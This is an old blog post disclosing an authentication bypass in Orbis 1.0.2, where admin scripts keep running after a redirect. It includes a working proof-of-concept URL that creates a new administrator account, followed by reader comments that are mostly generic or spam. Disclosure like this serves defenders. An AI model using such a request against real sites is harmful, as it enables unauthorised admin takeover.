XSS - Cross-Site Scripting: Orbis 1.0.2 Authentication Bypass

This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin related scripts fail to terminate after setting the header location field.

PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@

6 comments:

Tiger_WONGJuly 18, 2010 at 4:45 AM
can u explain to me how to execute this...thanx
ReplyDelete
Replies
Akai.ShuuMarch 26, 2011 at 12:09 AM
gud site!
ReplyDelete
Replies
android tabletJuly 15, 2011 at 5:59 PM
Good post. Thanks for sharing.
ReplyDelete
Replies
MCADecember 13, 2011 at 8:49 AM
MLS Kitchener Quail West

thank for sharing!
ReplyDelete
Replies
vaiyboraSeptember 18, 2017 at 3:54 AM
Thanks for providing good information,Thanks for your sharing.

ดูหนัง
ReplyDelete
Replies
mctisoJuly 28, 2022 at 3:37 PM
find this replica ysl Go Here replica bags online this content replica louis vuitton
ReplyDelete
Replies

Subscribe to: Post Comments (Atom)